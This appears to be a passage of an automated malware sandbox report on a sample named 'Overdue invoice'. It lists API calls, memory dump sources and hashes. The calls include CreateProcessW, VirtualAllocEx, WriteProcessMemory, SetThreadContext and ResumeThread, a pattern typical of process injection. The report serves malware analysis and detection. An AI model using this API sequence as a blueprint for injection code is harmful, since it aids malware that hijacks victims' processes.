                                                                          • Opcode ID: 84978a394f03d7bd768da13cc393a58ade2f7543d0bfa1fd6f8fe0593abebdb6
                                                                          • Instruction ID: adad44d557887076f907737dccd256ed43d445833ec7e7c72a8c4cfb4175dc95
                                                                          • Opcode Fuzzy Hash: 84978a394f03d7bd768da13cc393a58ade2f7543d0bfa1fd6f8fe0593abebdb6
                                                                          • Instruction Fuzzy Hash: EAD02236F14A348F4A69624EA0D04ED328DC7446353000419F80AC7700CF19FD0243D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb96885f3d82ecbd99737fa89c4d8e983d87cbcee7993d9ec6b64300cf435be7
                                                                          • Instruction ID: 58140aa708f21008b6567bf2fc0a90a9f70722a2584a769f4e2bcdb0326cd119
                                                                          • Opcode Fuzzy Hash: eb96885f3d82ecbd99737fa89c4d8e983d87cbcee7993d9ec6b64300cf435be7
                                                                          • Instruction Fuzzy Hash: B8D0C93AA14104CBCB147BB0F8890DCB735EF8132AF5241B9D50696154CB3168108B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:12.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:173
                                                                          Total number of Limit Nodes:10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B590
                                                                          • GetCurrentThread.KERNEL32 ref: 02C6B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02C6B663
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 3af8af29c6fd1d8dcdc39edc6ac57bbd517341248b7477e5174e0f79a64407c1
                                                                          • Instruction ID: 4eb7ae9bd0249efe75d697cb9d7733f519810101f94942c492c858f8f5555036
                                                                          • Opcode Fuzzy Hash: 3af8af29c6fd1d8dcdc39edc6ac57bbd517341248b7477e5174e0f79a64407c1
                                                                          • Instruction Fuzzy Hash: E75155B0D006498FDB14DFAACA887EEBBF0EF88318F24855AE419B7350D7349944CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B590
                                                                          • GetCurrentThread.KERNEL32 ref: 02C6B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02C6B663
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 65b864f7578d8e092ae9034f06addb210d1a4f8b1fd9f35d15106b06e24f4302
                                                                          • Instruction ID: c96c814639feb039c1d653bceafe287eb94df8b21fc076d936f1e818f022f4f5
                                                                          • Opcode Fuzzy Hash: 65b864f7578d8e092ae9034f06addb210d1a4f8b1fd9f35d15106b06e24f4302
                                                                          • Instruction Fuzzy Hash: BE5156B0D006498FDB14DFAAC988BEEBBF0EF88318F24855AE409B7350D7349944CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02C69776
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 833ffce916baff2b1092c719b55460e95258d8f7332d18b3dce05631a6ded861
                                                                          • Instruction ID: 2f5f3378a0d01291ba683c7a6bda41a9e5e2d9db0987977b4c848e300c507c39
                                                                          • Opcode Fuzzy Hash: 833ffce916baff2b1092c719b55460e95258d8f7332d18b3dce05631a6ded861
                                                                          • Instruction Fuzzy Hash: 287148B0A00B058FDB64DF2AD4887AAB7F1FF88214F108A2DD45AD7A50D734E945CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 798ff89752859e55a490ac6562ac22d85e02579411c9d08d187867993f4d755d
                                                                          • Instruction ID: f8032a2bde654364a64ee1b3b1bdfbeb8c24784815f08d71b11805a5f28339b0
                                                                          • Opcode Fuzzy Hash: 798ff89752859e55a490ac6562ac22d85e02579411c9d08d187867993f4d755d
                                                                          • Instruction Fuzzy Hash: D9611671D00368DFDB51CF99C880BDDBBB2AF49314F15819AE908A7260DB356A89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 39656b31146f06b641eab35ecfa88f99d19149a7c7eb89a0738fc8531888659d
                                                                          • Instruction ID: 59a65ac11aaf87d1805e5b7849be5ac73524b19db201eca16a181a47c3a6cbf9
                                                                          • Opcode Fuzzy Hash: 39656b31146f06b641eab35ecfa88f99d19149a7c7eb89a0738fc8531888659d
                                                                          • Instruction Fuzzy Hash: 7F513871900368EFDB50CF96C880BDDBBB6BF48314F158099E908B7250DB75AA89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 581c13915410e9be28bf720232ab920930edb0fef53941d80607f32646a29ec3
                                                                          • Instruction ID: b549181ff0a7155b587987091f21a3a4aeb1a6f907db8aed0f0bf06d33a4109c
                                                                          • Opcode Fuzzy Hash: 581c13915410e9be28bf720232ab920930edb0fef53941d80607f32646a29ec3
                                                                          • Instruction Fuzzy Hash: DF510671900368DFDB50CF96C880BDDBBB2BF48314F15809AE908B7250DB75AA89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 0e93ce7d0484893b2bdcfd39348129fa005c6f6a01cdd824e3c2fb06c11710c9
                                                                          • Instruction ID: 4876af1b2d6c1f2336dacc2750f60c03ecdaba825b7bbcd9a4197d73b26dee39
                                                                          • Opcode Fuzzy Hash: 0e93ce7d0484893b2bdcfd39348129fa005c6f6a01cdd824e3c2fb06c11710c9
                                                                          • Instruction Fuzzy Hash: 4051D2B1D003599FDB14CFAAD894ADEBFB1BF88314F24812AE419AB211D7709945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 133c595957d385cf10e26f6c5d0826cb131f87b5160d511cbea19d79343de973
                                                                          • Instruction ID: 00d3c9d1ecc835efb9babd03ddef171afcecb02e737aa208d59e1d00622eccf2
                                                                          • Opcode Fuzzy Hash: 133c595957d385cf10e26f6c5d0826cb131f87b5160d511cbea19d79343de973
                                                                          • Instruction Fuzzy Hash: E641C2B1D00309DFDB14CF9AD884AEEBBB5BF88314F24812EE819AB210D7749945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: eb5e10b359c2871e4e1160e8f552a709aae166936ebbd453848cb73474396f7d
                                                                          • Instruction ID: a94843b4150b9a3e9cde7645b0ede6bcbb3057ed2d37ff9a919bc551e9310279
                                                                          • Opcode Fuzzy Hash: eb5e10b359c2871e4e1160e8f552a709aae166936ebbd453848cb73474396f7d
                                                                          • Instruction Fuzzy Hash: 3341CFB1D00309DFDB14CF9AD884ADEBBB5BF88314F24812AE819AB210D7749945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CF38B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 707f627cea93314893edf595305cf749f6715c86f6be2d6c4c8f2e440d7e6711
                                                                          • Instruction ID: 293e71fb382dfbceaeadef4ede8100ae242d706891f19cfc4b271d8b43738a60
                                                                          • Opcode Fuzzy Hash: 707f627cea93314893edf595305cf749f6715c86f6be2d6c4c8f2e440d7e6711
                                                                          • Instruction Fuzzy Hash: 802103B5900259DFCB10CF9AC985BDEBBF5FF48314F10842AE918A3350D378A944CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CF38B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 80bbafe89dbdaeca1bf1c2ad737dbf502b7c792e303b5e8c05dbcbb9e84476ae
                                                                          • Instruction ID: dd59668eb58a1cd4819698cf0f86fe1ca832e80a79dd0181ee94f63d792cb590
                                                                          • Opcode Fuzzy Hash: 80bbafe89dbdaeca1bf1c2ad737dbf502b7c792e303b5e8c05dbcbb9e84476ae
                                                                          • Instruction Fuzzy Hash: 892114B1900299DFCB10CF9AC884BDEBBF4FF48314F50842AE918A3350D778A944CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04CF3667
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: bae5ee883215868f22480a193375683641f80e7a2ce6c7b30ed62b7584d3ae13
                                                                          • Instruction ID: fb1852ece6c83d760e86d38178ca581e163e9741235e3a4f0241a790acd5a4f4
                                                                          • Opcode Fuzzy Hash: bae5ee883215868f22480a193375683641f80e7a2ce6c7b30ed62b7584d3ae13
                                                                          • Instruction Fuzzy Hash: 3B2129B1D002599BCB10CF9AC88579EFBF4BB49224F54812AE918B7341D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 957e62fec079b5029329287422b063b4d8a5f8bab8fee90260905043ee15ee07
                                                                          • Instruction ID: 8df767b7dee44b6456ff8fca140988e9fdf566c2f96efc0716838189e2df06f1
                                                                          • Opcode Fuzzy Hash: 957e62fec079b5029329287422b063b4d8a5f8bab8fee90260905043ee15ee07
                                                                          • Instruction Fuzzy Hash: 7521E3B5900249DFDB10CFAAD984AEEBBF8BF48324F14845AE954B3311C374A954CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1a61e1d6380a04ac8928b3c03ec0e44458f24dbf0f0483b19b78413af5b19678
                                                                          • Instruction ID: 5de4eee57134403891f908739d7c59cb1cc68c1717aa7ef460ea2697dae0df66
                                                                          • Opcode Fuzzy Hash: 1a61e1d6380a04ac8928b3c03ec0e44458f24dbf0f0483b19b78413af5b19678
                                                                          • Instruction Fuzzy Hash: 8021E4B5900249DFDB10CFAAD984AEEBBF8EB48324F14801AE914A3310C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CF372F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 1a0d027460969c548664254e5bc4fdb5224ec377ae8c59200b0c23aea00ca5c3
                                                                          • Instruction ID: d9e4d8b341a262e6cdcbf8907b0481c714be26445752b3485678a03476154368
                                                                          • Opcode Fuzzy Hash: 1a0d027460969c548664254e5bc4fdb5224ec377ae8c59200b0c23aea00ca5c3
                                                                          • Instruction Fuzzy Hash: 8F2102B5900659DFCB10CF9AC884BDEBBF4FB48320F14842AE918A7351D338A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CF372F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 7c8888e926acf8606c89f76336e9e31d1165f17e241ec7907cf1f5a732134b3c
                                                                          • Instruction ID: 8ee430ffadac2c653eb4345b87fda0ab346ea2d44e27c85346f374c9bf8f2fc8
                                                                          • Opcode Fuzzy Hash: 7c8888e926acf8606c89f76336e9e31d1165f17e241ec7907cf1f5a732134b3c
                                                                          • Instruction Fuzzy Hash: 2A21E2B5900659DFCB10CF9AD884BDEBBF4FB48320F10842AE918A7251D378A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04CF3667
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 194a67fbc7cf58c0bb2ea981bab561b3cac9b08192d40f4eb6af93bce4c71ef5
                                                                          • Instruction ID: 2ab2e9350ee1f20552950c813055ff2ff26459bed1f94f30cf7ad9e48f5caf44
                                                                          • Opcode Fuzzy Hash: 194a67fbc7cf58c0bb2ea981bab561b3cac9b08192d40f4eb6af93bce4c71ef5
                                                                          • Instruction Fuzzy Hash: 6F2108B1D006599FCB10CF9AC8457DEFBF4BB48624F54812AE918B7341D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0736BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.381718648.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7360000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1346a7f4d61bebaecb9448e9bd5ae0bb9a283ed45081561ed14a6832882bd4f1
                                                                          • Instruction ID: 5270e62e13be913b5831017e187d1036a81790728ffba16b039267b2d1ab1d8c
                                                                          • Opcode Fuzzy Hash: 1346a7f4d61bebaecb9448e9bd5ae0bb9a283ed45081561ed14a6832882bd4f1
                                                                          • Instruction Fuzzy Hash: 502114B19002599FCB10CF9AC884BDEFBF8FF48320F10842AE958A7241D378A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C697F1,00000800,00000000,00000000), ref: 02C69A02
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: df6db251e529807554ede8c15b5d937d763641cafd96565f85e4dcb0b576b24c
                                                                          • Instruction ID: 26bb0eab99bd00d87fa40e06f7ff1e35f33faea0f83685f4cc40a553cd6d9ac2
                                                                          • Opcode Fuzzy Hash: df6db251e529807554ede8c15b5d937d763641cafd96565f85e4dcb0b576b24c
                                                                          • Instruction Fuzzy Hash: 641114B2D002498FCB10DF9AC488BEEFBF4EB88364F15842EE419A7201C375A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C697F1,00000800,00000000,00000000), ref: 02C69A02
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 253d7d2f2f72a5fb9c4d73afbd116326d0be06d05dc2038b309b059d7ee6ea15
                                                                          • Instruction ID: d849eca6045b9816c210c7e875a0a55bf501c0229e4502dcd77d40b65c09eb6c
                                                                          • Opcode Fuzzy Hash: 253d7d2f2f72a5fb9c4d73afbd116326d0be06d05dc2038b309b059d7ee6ea15
                                                                          • Instruction Fuzzy Hash: B11103B29002498FCB10CFAAD484AEEFBF4AF88324F15846EE419A7601C775A545CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 088d5a3678c4c8ecc2d121d9c98b69501c6c94285a122406db5c8d94d351b59b
                                                                          • Instruction ID: 0d8dee674927d497927e6f4631106726ddc994bccaa1ae3df3c44a166fe89b3f
                                                                          • Opcode Fuzzy Hash: 088d5a3678c4c8ecc2d121d9c98b69501c6c94285a122406db5c8d94d351b59b
                                                                          • Instruction Fuzzy Hash: A2113AB1D00248DFDB50DFA9D88579EBBF4EF48314F1484AAD919A3351E738AA44CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CF37EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: aa33d709e8d382e45490ca335e505b3884596e1a5030a3b97e4eb35abe504fdd
                                                                          • Instruction ID: 7dfcecb2d86e203f68e6731d8ebaf546a12dfbf199bd04516477d9cdcfd0f629
                                                                          • Opcode Fuzzy Hash: aa33d709e8d382e45490ca335e505b3884596e1a5030a3b97e4eb35abe504fdd
                                                                          • Instruction Fuzzy Hash: 5D1134B5800289DFCB10CF9AC884BDEBFF4FB48320F24841AE919A7210C339A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CF37EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: e84e2ebf2b8945ce86011c4f6dea399fd5178e4bfe12f50241a6b9bb0eaefecc
                                                                          • Instruction ID: 8a702b764d467547f10cc09415a5559aec25eb4098ae8968f1eb233e7a8f3b0f
                                                                          • Opcode Fuzzy Hash: e84e2ebf2b8945ce86011c4f6dea399fd5178e4bfe12f50241a6b9bb0eaefecc
                                                                          • Instruction Fuzzy Hash: 1E11F8B5900649DFCB10DF9AD884BDEBFF4FB48324F24841AE519A7250C375A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02C69776
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: e880ec5ea69d3f8df1eb443c6fd586099ae2e4c789cc013dc67d256bf744922c
                                                                          • Instruction ID: 50a2f6701f9e5e714f241a3ca97f0d42678cfa3c2c66c7f9e3e556639732143c
                                                                          • Opcode Fuzzy Hash: e880ec5ea69d3f8df1eb443c6fd586099ae2e4c789cc013dc67d256bf744922c
                                                                          • Instruction Fuzzy Hash: 5D1110B5D002498FCB10CF9AC488BDEFBF8AF88224F14852AD829B7200C374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04CF3D5D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: daab80a79bdd8a8f9a756b24295dbf4edb8463525a78d1b3a8bad84feb66d449
                                                                          • Instruction ID: 605fd0acea17aba792fabf117472aca32a0d55b6ff35565236357afefd13b16e
                                                                          • Opcode Fuzzy Hash: daab80a79bdd8a8f9a756b24295dbf4edb8463525a78d1b3a8bad84feb66d449
                                                                          • Instruction Fuzzy Hash: 5C11C2B59002499FDB10DF9AD885BDEBBF8EB48324F14841AE959A7211C374A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 02C6FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: e7c68b401da9fecf64231c37c7269b637dd901da067aef506213df3b5570c0d1
                                                                          • Instruction ID: b2aa343bcfed3b821ad97f9e360fa4e3d69b4a80991f25a319066cbeb2c66700
                                                                          • Opcode Fuzzy Hash: e7c68b401da9fecf64231c37c7269b637dd901da067aef506213df3b5570c0d1
                                                                          • Instruction Fuzzy Hash: F51106B59002499FDB10DF9AD484BDEBBF8EB48324F20841AE815A7701C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

